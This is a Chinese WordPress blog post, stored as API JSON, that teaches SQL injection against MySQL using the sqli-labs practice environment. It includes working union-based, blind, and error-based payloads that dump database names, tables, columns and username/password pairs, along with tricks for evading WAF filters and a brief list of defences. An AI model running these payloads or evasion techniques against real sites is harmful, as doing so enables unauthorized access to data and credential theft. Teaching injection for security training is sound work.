{"id":72,"date":"2025-11-23T20:17:19","date_gmt":"2025-11-23T12:17:19","guid":{"rendered":"http:\/\/www.commonlife.top\/?p=72"},"modified":"2025-11-23T20:21:17","modified_gmt":"2025-11-23T12:21:17","slug":"sql%e6%b3%a8%e5%85%a5%e4%b8%8e%e6%94%bb%e9%98%b2-1","status":"publish","type":"post","link":"http:\/\/www.commonlife.top\/index.php\/2025\/11\/23\/sql%e6%b3%a8%e5%85%a5%e4%b8%8e%e6%94%bb%e9%98%b2-1\/","title":{"rendered":"SQL\u6ce8\u5165\u4e0e\u653b\u9632\u57fa\u7840"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">1\u3001SQL\u6ce8\u5165\u4e0eMySQL\u57fa\u7840<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">1. SQL\u6ce8\u5165\u6982\u8ff0<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">1.1 \u4ec0\u4e48\u662fSQL\u6ce8\u5165<\/h5>\n\n\n\n<p>SQL\u6ce8\u5165\uff08SQL Injection\uff09\u662f\u4e00\u79cd\u5e38\u89c1\u7684Web\u5b89\u5168\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5229\u7528\u5e94\u7528\u7a0b\u5e8f\u5bf9\u7528\u6237\u8f93\u5165\u6570\u636e\u7684\u5408\u6cd5\u6027\u5224\u65ad\u4e0d\u8db3\uff0c\u5728\u9884\u5148\u5b9a\u4e49\u7684SQL\u67e5\u8be2\u8bed\u53e5\u4e2d\u63d2\u5165\u6076\u610f\u7684SQL\u4ee3\u7801\uff0c\u4ece\u800c\u6b3a\u9a97\u6570\u636e\u5e93\u670d\u52a1\u5668\u6267\u884c\u975e\u6388\u6743\u7684\u64cd\u4f5c\u3002\u8fd9\u79cd\u653b\u51fb\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u6cc4\u9732\u3001\u6570\u636e\u7be1\u6539\u3001\u751a\u81f3\u670d\u52a1\u5668\u88ab\u63a7\u5236\u7b49\u4e25\u91cd\u540e\u679c\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">1.2 Web\u5e94\u7528\u7a0b\u5e8f\u7684\u4e09\u5c42\u67b6\u6784<\/h5>\n\n\n\n<p>\u5178\u578b\u7684Web\u5e94\u7528\u7a0b\u5e8f\u91c7\u7528\u4e09\u5c42\u67b6\u6784\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u89c6\u56fe\u5c42\uff08View\uff09<\/strong>\uff1a\u8d1f\u8d23\u7528\u6237\u754c\u9762\u548c\u4ea4\u4e92\u3002<\/li>\n\n\n\n<li><strong>\u4e1a\u52a1\u903b\u8f91\u5c42\uff08Business Logic\uff09<\/strong>\uff1a\u5904\u7406\u7528\u6237\u8bf7\u6c42\u5e76\u6267\u884c\u4e1a\u52a1\u89c4\u5219\u3002<\/li>\n\n\n\n<li><strong>\u6570\u636e\u8bbf\u95ee\u5c42\uff08Data Access\uff09<\/strong>\uff1a\u8d1f\u8d23\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\uff0c\u6267\u884cSQL\u67e5\u8be2\u3002<\/li>\n<\/ul>\n\n\n\n<p>SQL\u6ce8\u5165\u901a\u5e38\u53d1\u751f\u5728\u6570\u636e\u8bbf\u95ee\u5c42\uff0c\u7531\u4e8e\u672a\u5bf9\u7528\u6237\u8f93\u5165\u8fdb\u884c\u5145\u5206\u8fc7\u6ee4\u6216\u9a8c\u8bc1\uff0c\u5bfc\u81f4\u6076\u610fSQL\u4ee3\u7801\u88ab\u62fc\u63a5\u5230\u67e5\u8be2\u8bed\u53e5\u4e2d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">2. SQL\u6ce8\u5165\u4e4bMySQL\u8bed\u53e5\u8bed\u6cd5<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">2.1 \u6570\u636e\u5e93\u6982\u8ff0<\/h5>\n\n\n\n<p>\u6570\u636e\u5e93\u662f\u5b58\u50a8\u6570\u636e\u7684\u4ed3\u5e93\uff0c\u6309\u7ed3\u6784\u53ef\u5206\u4e3a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u5173\u7cfb\u578b\u6570\u636e\u5e93\uff08RDBMS\uff09<\/strong>\uff1a\u4ee5\u8868\u683c\u5f62\u5f0f\u5b58\u50a8\u6570\u636e\uff0c\u8868\u4e0e\u8868\u4e4b\u95f4\u5b58\u5728\u590d\u6742\u5173\u8054\u3002\u5e38\u89c1\u7684\u6709MySQL\u3001Oracle\u3001SQL Server\u7b49\u3002<\/li>\n\n\n\n<li><strong>\u975e\u5173\u7cfb\u578b\u6570\u636e\u5e93\uff08NoSQL\uff09<\/strong>\uff1a\u9002\u7528\u4e8e\u7ed3\u6784\u7075\u6d3b\u3001\u9ad8\u5e76\u53d1\u573a\u666f\uff0c\u5982MongoDB\u3001Redis\u3002<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\">2.2 \u6570\u636e\u5e93\u670d\u52a1\u5668\u5c42\u7ea7\u5173\u7cfb<\/h5>\n\n\n\n<p>\u6570\u636e\u5e93\u670d\u52a1\u5668\u7684\u6570\u636e\u7ec4\u7ec7\u5c42\u6b21\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u670d\u52a1\u5668 \u2192 \u591a\u4e2a\u6570\u636e\u5e93 \u2192 \u591a\u4e2a\u8868 \u2192 \u591a\u4e2a\u884c\u548c\u5217 \u2192 \u6570\u636e<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">2.3 SQL\u8bed\u53e5\u8bed\u6cd5\u56de\u987e<\/h5>\n\n\n\n<p>\u4ee5\u4e0b\u662f\u4e00\u4e9b\u5e38\u7528\u7684SQL\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u67e5\u8be2\u6240\u6709\u6570\u636e\u5e93\nSHOW DATABASES;\n\n-- \u9009\u62e9\u6570\u636e\u5e93\nUSE test;\n\n-- \u67e5\u8be2\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\nSHOW TABLES;\n\n-- \u67e5\u8be2\u8868\u4e2d\u6240\u6709\u6570\u636e\nSELECT * FROM t1;\n\n-- \u6761\u4ef6\u67e5\u8be2\nSELECT * FROM t1 WHERE id = 2;\n\n-- \u8054\u5408\u67e5\u8be2\uff08UNION\uff09\nSELECT * FROM t1 WHERE id = -1 UNION SELECT * FROM t1 WHERE pass = '111';\n\n-- \u6392\u5e8f\uff08ORDER BY\uff09\nSELECT * FROM t1 ORDER BY id;<\/code><\/pre>\n\n\n\n<p><strong>\u6ce8\u610f<\/strong>\uff1a\u4f7f\u7528<code>UNION<\/code>\u65f6\uff0c\u524d\u540e\u67e5\u8be2\u7684\u5b57\u6bb5\u6570\u91cf\u5fc5\u987b\u4e00\u81f4\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">3. SQL\u6ce8\u5165\u4e4bMySQL\u7cfb\u7edf\u5e93<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">3.1 \u7cfb\u7edf\u5e93\u91ca\u4e49<\/h5>\n\n\n\n<p>MySQL\u63d0\u4f9b\u4e86\u51e0\u4e2a\u7cfb\u7edf\u5e93\uff0c\u7528\u4e8e\u5b58\u50a8\u5143\u6570\u636e\uff08\u5173\u4e8e\u6570\u636e\u5e93\u7684\u6570\u636e\uff09\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>information_schema<\/strong>\uff1a<\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b58\u50a8\u6240\u6709\u6570\u636e\u5e93\u3001\u8868\u3001\u5217\u7684\u4fe1\u606f\u3002<\/li>\n\n\n\n<li>\u5e38\u7528\u8868\uff1a\n<ul class=\"wp-block-list\">\n<li><code>SCHEMATA<\/code>\uff1a\u6240\u6709\u6570\u636e\u5e93\u4fe1\u606f\u3002<\/li>\n\n\n\n<li><code>TABLES<\/code>\uff1a\u6240\u6709\u8868\u4fe1\u606f\u3002<\/li>\n\n\n\n<li><code>COLUMNS<\/code>\uff1a\u6240\u6709\u5217\u4fe1\u606f\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>performance_schema<\/strong>\uff1a<\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528\u4e8e\u6536\u96c6\u6570\u636e\u5e93\u670d\u52a1\u5668\u6027\u80fd\u53c2\u6570\uff0c\u6570\u636e\u5b58\u50a8\u5728\u5185\u5b58\u4e2d\u3002<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>mysql<\/strong>\uff1a<\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6838\u5fc3\u6570\u636e\u5e93\uff0c\u5b58\u50a8\u7528\u6237\u4fe1\u606f\u3001\u6743\u9650\u8bbe\u7f6e\u7b49\u5173\u952e\u6570\u636e\u3002<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>sys<\/strong>\uff1a<\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u63d0\u4f9b\u6613\u4e8e\u7406\u89e3\u7684\u89c6\u56fe\uff0c\u6574\u5408\u4e86<code>information_schema<\/code>\u548c<code>performance_schema<\/code>\u7684\u4fe1\u606f\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">2\u3001SQL\u6ce8\u5165\u4e4bMySQL\u624b\u5de5\u6ce8\u5165<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">1.SQL\u6ce8\u5165\u57fa\u7840\u6982\u5ff5<\/h4>\n\n\n\n<p>SQL\u6ce8\u5165\uff08SQL Injection\uff09\u662f\u4e00\u79cd\u5e38\u89c1\u7684Web\u5b89\u5168\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u901a\u8fc7\u5728\u5e94\u7528\u7a0b\u5e8f\u7684\u8f93\u5165\u53c2\u6570\u4e2d\u63d2\u5165\u6076\u610f\u7684SQL\u4ee3\u7801\uff0c\u4ece\u800c\u6b3a\u9a97\u6570\u636e\u5e93\u670d\u52a1\u5668\u6267\u884c\u975e\u9884\u671f\u7684\u4efb\u610fSQL\u67e5\u8be2\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u6ce8\u5165\u539f\u7406<\/h5>\n\n\n\n<p>\u5f53Web\u5e94\u7528\u7a0b\u5e8f\u672a\u5bf9\u7528\u6237\u8f93\u5165\u8fdb\u884c\u5145\u5206\u9a8c\u8bc1\u548c\u8fc7\u6ee4\uff0c\u76f4\u63a5\u5c06\u7528\u6237\u8f93\u5165\u62fc\u63a5\u5230SQL\u8bed\u53e5\u4e2d\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u7279\u6b8a\u8f93\u5165\u6765\u6539\u53d8\u539fSQL\u8bed\u53e5\u7684\u8bed\u4e49\u548c\u6267\u884c\u903b\u8f91\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">2.GET\u4e0ePOST\u63d0\u4ea4\u65b9\u5f0f\u7684\u533a\u522b<\/h4>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u7279\u6027<\/th><th>GET\u8bf7\u6c42<\/th><th>POST\u8bf7\u6c42<\/th><\/tr><\/thead><tbody><tr><td><strong>\u6570\u636e\u4f4d\u7f6e<\/strong><\/td><td>URL\u53c2\u6570\u4e2d\uff08?\u540e\u9762\uff09<\/td><td>HTTP\u8bf7\u6c42\u4f53\u4e2d<\/td><\/tr><tr><td><strong>\u6570\u636e\u957f\u5ea6<\/strong><\/td><td>\u53d7\u9650\uff08URL\u957f\u5ea6\u9650\u5236\uff09<\/td><td>\u7406\u8bba\u4e0a\u65e0\u9650\u5236<\/td><\/tr><tr><td><strong>\u5b89\u5168\u6027<\/strong><\/td><td>\u8f83\u4f4e\uff08\u53c2\u6570\u66b4\u9732\u5728URL\u4e2d\uff09<\/td><td>\u8f83\u9ad8\uff08\u53c2\u6570\u4e0d\u53ef\u89c1\uff09<\/td><\/tr><tr><td><strong>\u901f\u5ea6<\/strong><\/td><td>\u8f83\u5feb\uff08\u53ef\u7f13\u5b58\uff09<\/td><td>\u8f83\u6162<\/td><\/tr><tr><td><strong>\u7528\u9014<\/strong><\/td><td>\u83b7\u53d6\u6570\u636e\uff08\u67e5\u8be2\u64cd\u4f5c\uff09<\/td><td>\u63d0\u4ea4\u6570\u636e\uff08\u4fee\u6539\u64cd\u4f5c\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">3.\u624b\u5de5SQL\u6ce8\u5165\u5b8c\u6574\u6d41\u7a0b<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">1. \u5224\u65ad\u6ce8\u5165\u70b9\u7c7b\u578b<\/h5>\n\n\n\n<p><strong>\u6570\u5b57\u578b\u6ce8\u5165\uff08\u5982sqli-labs Less-2\uff09<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u539fSQL\uff1aSELECT * FROM users WHERE id = $id\n\u6d4b\u8bd5\uff1a?id=1 and 1=1 -- \u6b63\u5e38\u663e\u793a\n      ?id=1 and 1=2 -- \u65e0\u7ed3\u679c\u663e\u793a<\/code><\/pre>\n\n\n\n<p><strong>\u5b57\u7b26\u578b\u6ce8\u5165<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u539fSQL\uff1aSELECT * FROM users WHERE id = '$id'\n\u6d4b\u8bd5\uff1a?id=1' and '1'='1' -- \u6b63\u5e38\u663e\u793a\n      ?id=1' and '1'='2' -- \u65e0\u7ed3\u679c\u663e\u793a<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">2. \u786e\u5b9a\u5b57\u6bb5\u6570\u91cf\uff08ORDER BY\uff09<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1 order by 1 -- \u6b63\u5e38\n?id=1 order by 2 -- \u6b63\u5e38\n?id=1 order by 3 -- \u6b63\u5e38\n?id=1 order by 4 -- \u6b63\u5e38\n?id=1 order by 5 -- \u62a5\u9519\uff08\u8bf4\u660e\u67094\u4e2a\u5b57\u6bb5\uff09<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">3. \u786e\u5b9a\u56de\u663e\u70b9\uff08UNION SELECT\uff09[[\u786e\u5b9a\u56de\u663e\u70b9\uff08union select\uff09]]<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1 union select 1,2,3,4 -- \n-- \u5c06\u539f\u67e5\u8be2\u8bbe\u7f6e\u4e3a\u65e0\u7ed3\u679c\uff0c\u4f7funion\u67e5\u8be2\u7ed3\u679c\u663e\u793a\u51fa\u6765\n-- \u89c2\u5bdf\u9875\u9762\u4e2d\u6570\u5b572\u548c3\u7684\u4f4d\u7f6e\uff08\u56de\u663e\u70b9\uff09<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">4. \u4fe1\u606f\u6536\u96c6<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u6570\u636e\u5e93\u7248\u672c\n?id=-1 union select 1,version(),3,4\n\n-- \u5f53\u524d\u6570\u636e\u5e93\u540d\n?id=-1 union select 1,database(),3,4\n\n-- \u5f53\u524d\u7528\u6237\n?id=-1 union select 1,user(),3,4\n\n-- \u670d\u52a1\u5668\u4e3b\u673a\u540d\n?id=-1 union select 1,@@hostname,3,4<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">5. \u83b7\u53d6\u6570\u636e\u5e93\u4e2d\u7684\u8868\uff08MySQL \u2265 5.0\uff09<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u83b7\u53d6security\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\n?id=-1 union select 1,group_concat(table_name),3,4 \nfrom information_schema.tables \nwhere table_schema='security'\n\n-- \u5341\u516d\u8fdb\u5236\u5199\u6cd5\uff08\u907f\u514d\u5f15\u53f7\u8fc7\u6ee4\uff09\n?id=-1 union select 1,group_concat(table_name),3,4 \nfrom information_schema.tables \nwhere table_schema=0x7365637572697479 -- security\u7684\u5341\u516d\u8fdb\u5236<\/code><\/pre>\n\n\n\n<p><strong>\u793a\u4f8b\u7ed3\u679c<\/strong>\uff1aemails,referers,uagents,users<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">6. \u83b7\u53d6\u8868\u7684\u5b57\u6bb5\u540d<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u83b7\u53d6users\u8868\u7684\u6240\u6709\u5b57\u6bb5\n?id=-1 union select 1,group_concat(column_name),3,4 \nfrom information_schema.columns \nwhere table_name='users' and table_schema='security'\n\n-- \u5341\u516d\u8fdb\u5236\u5199\u6cd5\n?id=-1 union select 1,group_concat(column_name),3,4 \nfrom information_schema.columns \nwhere table_name=0x7573657273 -- users\u7684\u5341\u516d\u8fdb\u5236<\/code><\/pre>\n\n\n\n<p><strong>\u793a\u4f8b\u7ed3\u679c<\/strong>\uff1aid,username,password<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">7. \u63d0\u53d6\u6570\u636e<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u83b7\u53d6\u6240\u6709\u7528\u6237\u540d\u548c\u5bc6\u7801\n?id=-1 union select 1,group_concat(username,0x3a,password),3,4 \nfrom users\n\n-- \u5206\u6761\u83b7\u53d6\uff08\u907f\u514d\u6570\u636e\u8fc7\u591a\u4e0d\u663e\u793a\uff09\n?id=-1 union select 1,username,password,4 from users limit 0,1\n?id=-1 union select 1,username,password,4 from users limit 1,1<\/code><\/pre>\n\n\n\n<p><strong>\u793a\u4f8b\u7ed3\u679c<\/strong>\uff1aadmin:admin123, test:test123, \u2026<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">4.\u9ad8\u7ea7\u6ce8\u5165\u6280\u5de7<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">1. \u65f6\u95f4\u76f2\u6ce8\uff08\u5f53\u65e0\u56de\u663e\u65f6\uff09<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1 and if(ascii(substr(database(),1,1))&gt;100,sleep(3),0) -- \n-- \u5982\u679c\u6570\u636e\u5e93\u540d\u7b2c\u4e00\u4e2a\u5b57\u7b26\u7684ASCII\u7801\u5927\u4e8e100\uff0c\u5ef6\u8fdf3\u79d2\u54cd\u5e94<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">2. \u5e03\u5c14\u76f2\u6ce8<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1 and length(database())=8 -- \n-- \u5982\u679c\u6570\u636e\u5e93\u540d\u957f\u5ea6\u4e3a8\u5219\u6b63\u5e38\u663e\u793a\uff0c\u5426\u5219\u65e0\u7ed3\u679c<\/code><\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">3. \u62a5\u9519\u6ce8\u5165<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>-- \u4f7f\u7528extractvalue\u62a5\u9519\n?id=1 and extractvalue(1,concat(0x7e,(select version()),0x7e))\n\n-- \u4f7f\u7528updatexml\u62a5\u9519\n?id=1 and updatexml(1,concat(0x7e,(select user()),0x7e),1)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">5.\u9632\u5fa1\u63aa\u65bd<\/h4>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u4f7f\u7528\u53c2\u6570\u5316\u67e5\u8be2\uff08\u9884\u7f16\u8bd1\u8bed\u53e5\uff09<\/strong><\/li>\n\n\n\n<li><strong>\u5bf9\u8f93\u5165\u8fdb\u884c\u4e25\u683c\u9a8c\u8bc1\u548c\u8fc7\u6ee4<\/strong><\/li>\n\n\n\n<li><strong>\u4f7f\u7528\u6700\u5c0f\u6743\u9650\u539f\u5219<\/strong><\/li>\n\n\n\n<li><strong>\u5bf9\u6570\u636e\u5e93\u9519\u8bef\u4fe1\u606f\u8fdb\u884c\u5904\u7406<\/strong><\/li>\n\n\n\n<li><strong>\u4f7f\u7528Web\u5e94\u7528\u9632\u706b\u5899\uff08WAF\uff09<\/strong><\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\">6.\u5b9e\u6218\u6ce8\u610f\u4e8b\u9879<\/h4>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u6ce8\u91ca\u7b26\u4f7f\u7528<\/strong>\uff1a<code>--<\/code>\u3001<code>#<\/code>\u3001<code>\/* *\/<\/code><\/li>\n\n\n\n<li><strong>\u7a7a\u683c\u8fc7\u6ee4\u7ed5\u8fc7<\/strong>\uff1a\u4f7f\u7528<code>\/**\/<\/code>\u3001<code>%0a<\/code>\u3001<code>%0b<\/code>\u3001<code>%0c<\/code>\u3001<code>%0d<\/code>\u3001<code>%09<\/code>\u3001<code>%a0<\/code><\/li>\n\n\n\n<li><strong>\u5f15\u53f7\u8fc7\u6ee4\u7ed5\u8fc7<\/strong>\uff1a\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\uff080x\u2026\uff09<\/li>\n\n\n\n<li><strong>\u5173\u952e\u5b57\u8fc7\u6ee4\u7ed5\u8fc7<\/strong>\uff1a\u4f7f\u7528\u5927\u5c0f\u5199\u6df7\u5408\u3001\u53cc\u5199\u3001\u7f16\u7801\u7b49\u65b9\u5f0f<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>1\u3001SQL\u6ce8\u5165\u4e0eMySQL\u57fa\u7840 1. SQL\u6ce8\u5165\u6982\u8ff0 1.1 \u4ec0\u4e48\u662fSQL\u6ce8\u5165 SQL\u6ce8\u5165\uff08SQL Injec [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":71,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-72","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sql_attack_defense"],"_links":{"self":[{"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/posts\/72","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/comments?post=72"}],"version-history":[{"count":2,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/posts\/72\/revisions"}],"predecessor-version":[{"id":76,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/posts\/72\/revisions\/76"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/media\/71"}],"wp:attachment":[{"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/media?parent=72"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/categories?post=72"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.commonlife.top\/index.php\/wp-json\/wp\/v2\/tags?post=72"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}